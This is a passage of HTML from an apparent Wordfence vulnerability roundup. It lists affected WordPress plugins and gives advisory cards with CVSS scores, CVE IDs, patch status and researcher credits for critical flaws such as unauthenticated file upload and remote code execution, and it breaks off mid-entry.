			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gift-cards-lite" target="_blank" rel="noopener">woo-gift-cards-lite</a>
		</td>
</tr>
<tr>
<td>Unbounce Landing Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unbounce" target="_blank" rel="noopener">unbounce</a>
		</td>
</tr>
<tr>
<td>Unlimited Elements For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/unlimited-elements-for-elementor" target="_blank" rel="noopener">unlimited-elements-for-elementor</a>
		</td>
</tr>
<tr>
<td>User Access Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">user-access-manager</a>
		</td>
</tr>
<tr>
<td>User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">user-registration</a>
		</td>
</tr>
<tr>
<td>UsersWP – Front-end login form, User Registration, User Profile &amp; Members Directory plugin for WP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/userswp" target="_blank" rel="noopener">userswp</a>
		</td>
</tr>
<tr>
<td>Verified Reviews (Avis Vérifiés)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/netreviews" target="_blank" rel="noopener">netreviews</a>
		</td>
</tr>
<tr>
<td>Vigilant – 100% Free Security Suite: Firewall, 2FA, Login, Headers, Scanner…</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vigilante" target="_blank" rel="noopener">vigilante</a>
		</td>
</tr>
<tr>
<td>Visual Composer Website Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualcomposer" target="_blank" rel="noopener">visualcomposer</a>
		</td>
</tr>
<tr>
<td>Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">visualizer</a>
		</td>
</tr>
<tr>
<td>WebTotem Backups</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wt-backups" target="_blank" rel="noopener">wt-backups</a>
		</td>
</tr>
<tr>
<td>Wise Chat</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wise-chat" target="_blank" rel="noopener">wise-chat</a>
		</td>
</tr>
<tr>
<td>WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce" target="_blank" rel="noopener">woocommerce</a>
		</td>
</tr>
<tr>
<td>WP BackItUp Community Edition</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-backitup" target="_blank" rel="noopener">wp-backitup</a>
		</td>
</tr>
<tr>
<td>WP Compress – Instant Performance &amp; Speed Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-compress-image-optimizer" target="_blank" rel="noopener">wp-compress-image-optimizer</a>
		</td>
</tr>
<tr>
<td>WP Crowdfunding</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-crowdfunding" target="_blank" rel="noopener">wp-crowdfunding</a>
		</td>
</tr>
<tr>
<td>WP Directory Kit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">wpdirectorykit</a>
		</td>
</tr>
<tr>
<td>WP Docs</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-docs" target="_blank" rel="noopener">wp-docs</a>
		</td>
</tr>
<tr>
<td>WP Express Checkout (Fast Payments via PayPal &amp; Stripe)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-express-checkout" target="_blank" rel="noopener">wp-express-checkout</a>
		</td>
</tr>
<tr>
<td>WP Fast Total Search – The Power of Indexed Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">fulltext-search</a>
		</td>
</tr>
<tr>
<td>WP Fusion (Pro)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fusion" target="_blank" rel="noopener">wp-fusion</a>
		</td>
</tr>
<tr>
<td>WP Highlight Box</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-highlight-box" target="_blank" rel="noopener">wp-highlight-box</a>
		</td>
</tr>
<tr>
<td>WP Module Data</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-module-data" target="_blank" rel="noopener">wp-module-data</a>
		</td>
</tr>
<tr>
<td>WP Photo Album Plus</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">wp-photo-album-plus</a>
		</td>
</tr>
<tr>
<td>WP Plugin Bluehost</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bluehost-wordpress-plugin" target="_blank" rel="noopener">bluehost-wordpress-plugin</a>
		</td>
</tr>
<tr>
<td>WP Plugin Crazy Domains</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-crazy-domains" target="_blank" rel="noopener">wp-plugin-crazy-domains</a>
		</td>
</tr>
<tr>
<td>WP Plugin Hostgator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-hostgator" target="_blank" rel="noopener">wp-plugin-hostgator</a>
		</td>
</tr>
<tr>
<td>WP Plugin Web</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-plugin-web" target="_blank" rel="noopener">wp-plugin-web</a>
		</td>
</tr>
<tr>
<td>WP Recipe Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recipe-maker" target="_blank" rel="noopener">wp-recipe-maker</a>
		</td>
</tr>
<tr>
<td>WP Travel – Ultimate Travel Booking System, Tour Management Engine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">wp-travel</a>
		</td>
</tr>
<tr>
<td>WP-Members Membership Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-members" target="_blank" rel="noopener">wp-members</a>
		</td>
</tr>
<tr>
<td>WP-Stateless – Google Cloud Storage</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-stateless" target="_blank" rel="noopener">wp-stateless</a>
		</td>
</tr>
<tr>
<td>WPAdverts – Classifieds Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpadverts" target="_blank" rel="noopener">wpadverts</a>
		</td>
</tr>
<tr>
<td>WPBot – AI ChatBot for Live Support, Lead Generation, WordPress Automation, AI Services</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">chatbot</a>
		</td>
</tr>
<tr>
<td>WPCafe – Restaurant Menu, Online Food Ordering &amp; Table Booking System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-cafe" target="_blank" rel="noopener">wp-cafe</a>
		</td>
</tr>
<tr>
<td>WPCS – WordPress Currency Switcher Professional</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/currency-switcher" target="_blank" rel="noopener">currency-switcher</a>
		</td>
</tr>
<tr>
<td>WPFunnels – Funnel Builder for WooCommerce with Checkout &amp; One Click Upsell</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpfunnels" target="_blank" rel="noopener">wpfunnels</a>
		</td>
</tr>
<tr>
<td>WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">gdpr-cookie-consent</a>
		</td>
</tr>
<tr>
<td>WPML Multilingual CMS</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sitepress-multilingual-cms" target="_blank" rel="noopener">sitepress-multilingual-cms</a>
		</td>
</tr>
<tr>
<td>WPMR Google Feed Manager for WooCommerce – Sell on Google Merchant Center &amp; Shopping</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-product-feed-manager" target="_blank" rel="noopener">wp-product-feed-manager</a>
		</td>
</tr>
<tr>
<td>YITH WooCommerce Waitlist Premium</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yith-woocommerce-waiting-list-premium" target="_blank" rel="noopener">yith-woocommerce-waiting-list-premium</a>
		</td>
</tr>
<tr>
<td>YITH WooCommerce Wishlist</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yith-woocommerce-wishlist" target="_blank" rel="noopener">yith-woocommerce-wishlist</a>
		</td>
</tr>
<tr>
<td>Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youzify" target="_blank" rel="noopener">youzify</a>
		</td>
</tr>
<tr>
<td>Zephyr Project Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zephyr-project-manager" target="_blank" rel="noopener">zephyr-project-manager</a>
		</td>
</tr>
<tr>
<td>ZHBackup – Backup, Restore &amp; Migration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zhbackup" target="_blank" rel="noopener">zhbackup</a>
		</td>
</tr>
<tr>
<td>zipMoney(Zip Co) Payments Plugin for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zipmoney-payments-woocommerce" target="_blank" rel="noopener">zipmoney-payments-woocommerce</a>
		</td>
</tr>
<tr>
<td>المنتور فارسی</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">persian-elementor</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb420557-110b-47af-b88a-dbe6f0c6f393" target="_blank" rel="noopener">Advanced Customized Prompts &lt;= 1.0.1 &#8211; Unauthenticated Privilege Escalation via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14563" target="_blank" rel="noopener noreferrer">							CVE-2026-14563						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-customized-prompts" target="_blank" rel="noopener">Advanced Customized Prompts</a> <span class="wfvr-software-slug">[advanced-customized-prompts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb420557-110b-47af-b88a-dbe6f0c6f393" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03e853be-510f-4957-a227-17ca9f825b12" target="_blank" rel="noopener">Drag and Drop File Upload for Elementor Forms &lt;= 1.6.0 &#8211; Unauthenticated Arbitrary File Upload via &#8216;type&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18351" target="_blank" rel="noopener noreferrer">							CVE-2026-18351						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-file-upload-for-elementor-forms" target="_blank" rel="noopener">Drag and Drop File Upload for Elementor Forms</a> <span class="wfvr-software-slug">[drag-and-drop-file-upload-for-elementor-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4240823195d4b265f3cd4ca5947a5e1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4240823195d4b265f3cd4ca5947a5e1c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-rayyan-aryasatya" target="_blank" rel="noopener">Adam Rayyan Aryasatya</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03e853be-510f-4957-a227-17ca9f825b12" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9690fc8-cd0c-42e4-aa21-5c71243565f0" target="_blank" rel="noopener">Frontegg SAML SSO &lt;= 1.0.1 &#8211; Authentication Bypass to Admin</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75800" target="_blank" rel="noopener noreferrer">							CVE-2026-75800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontegg-saml-sso" target="_blank" rel="noopener">Frontegg SAML SSO</a> <span class="wfvr-software-slug">[frontegg-saml-sso]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b9690fc8-cd0c-42e4-aa21-5c71243565f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ac1257a9-7c8e-43aa-b21a-93a77b456aa4" target="_blank" rel="noopener">MIPL Grouped Checkout Fields for WooCommerce &lt;= 1.2.2 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8778" target="_blank" rel="noopener noreferrer">							CVE-2026-8778						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mipl-wc-checkout-fields" target="_blank" rel="noopener">MIPL Checkout Fields Manager for WooCommerce – Customize, Organize &amp; Group Checkout Fields.</a> <span class="wfvr-software-slug">[mipl-wc-checkout-fields]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farrukh-ziyaev" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6864a3370bb7095d718900423ff6139c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6864a3370bb7095d718900423ff6139c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farrukh-ziyaev" target="_blank" rel="noopener">Farrukh Ziyaev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ac1257a9-7c8e-43aa-b21a-93a77b456aa4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8631462c-75cd-4452-8698-e0d5b8f0963f" target="_blank" rel="noopener">Teddy Bear Customize Addon &lt;= 1.0.5 &#8211; Unauthenticated Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14560" target="_blank" rel="noopener noreferrer">							CVE-2026-14560						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teddy-bear-customize-addon" target="_blank" rel="noopener">Teddy Bear Customize Addon</a> <span class="wfvr-software-slug">[teddy-bear-customize-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8631462c-75cd-4452-8698-e0d5b8f0963f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/677a9713-e7c6-477d-9ba9-8b0e2bdb2c6d" target="_blank" rel="noopener">Teddy Bear Customize Addon &lt;= 1.0.5 &#8211; Unauthenticated Privilege Escalation via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14559" target="_blank" rel="noopener noreferrer">							CVE-2026-14559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teddy-bear-customize-addon" target="_blank" rel="noopener">Teddy Bear Customize Addon</a> <span class="wfvr-software-slug">[teddy-bear-customize-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/677a9713-e7c6-477d-9ba9-8b0e2bdb2c6d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2ccfeb-6df6-4fee-96a5-94f8dd131f7c" target="_blank" rel="noopener">The Events Calendar &lt;= 6.17.3 &#8211; Unauthenticated Code Injection to Remote Code Execution via Widget &#8216;classes&#8217; Map Callable Invocation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78159" target="_blank" rel="noopener noreferrer">							CVE-2026-78159						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar" target="_blank" rel="noopener">The Events Calendar</a> <span class="wfvr-software-slug">[the-events-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc2ccfeb-6df6-4fee-96a5-94f8dd131f7c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c67346-534a-4b67-a904-fa148703707a" target="_blank" rel="noopener">The Events Calendar &lt;= 6.17.4 &#8211; Unauthenticated PHP Object Injection to Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78006" target="_blank" rel="noopener noreferrer">							CVE-2026-78006						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar" target="_blank" rel="noopener">The Events Calendar</a> <span class="wfvr-software-slug">[the-events-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9bf72594e071c28445ed7a1be0de1a23.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9bf72594e071c28445ed7a1be0de1a23"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland" target="_blank" rel="noopener">Chloe Chamberland</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0c67346-534a-4b67-a904-fa148703707a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d430c863-6af1-4519-b276-3bf7e2b2d3c2" target="_blank" rel="noopener">Advanced Product Fields Extended for WooCommerce &lt;= 3.1.6 &#8211; Unauthenticated Arbitrary File Deletion</a></h4>
